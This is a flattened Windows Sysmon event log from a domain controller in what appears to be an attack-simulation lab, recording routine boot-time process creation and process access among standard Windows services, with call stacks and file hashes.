13:53:21.339{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001404Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.338{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3700-000000009101}3528C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.338{10ACEC4A-8551-5FCF-3700-000000009101}3528C:\Windows\System32\vdsldr.exe10.0.14393.0 (rs1_release.160715-1616)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001402Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.312{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001401Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.312{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001400Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.297{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001399Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.294{10ACEC4A-853E-5FCF-0A00-000000009101}852912C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001398Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.294{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001397Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.290{10ACEC4A-853E-5FCF-0A00-000000009101}852928C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001396Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.287{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001395Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.287{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001394Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.285{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001393Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.286{10ACEC4A-853E-5FCF-0A00-000000009101}852944C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001392Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.284{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001391Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.283{10ACEC4A-853E-5FCF-0A00-000000009101}8521192C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001390Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.273{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001389Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.280{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001388Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.280{10ACEC4A-853E-5FCF-0A00-000000009101}8521136C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001387Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.225{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\System32\dfsrs.exe10.0.14393.2879 (rs1_release_inmarket.190313-1855)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001386Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.279{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.279{10ACEC4A-853E-5FCF-0A00-000000009101}852912C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001384Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.268{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\System32\dfssvc.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001383Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.272{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001382Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.271{10ACEC4A-853E-5FCF-0A00-000000009101}852948C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001381Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.265{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001380Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.265{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001379Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.263{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.263{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001377Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 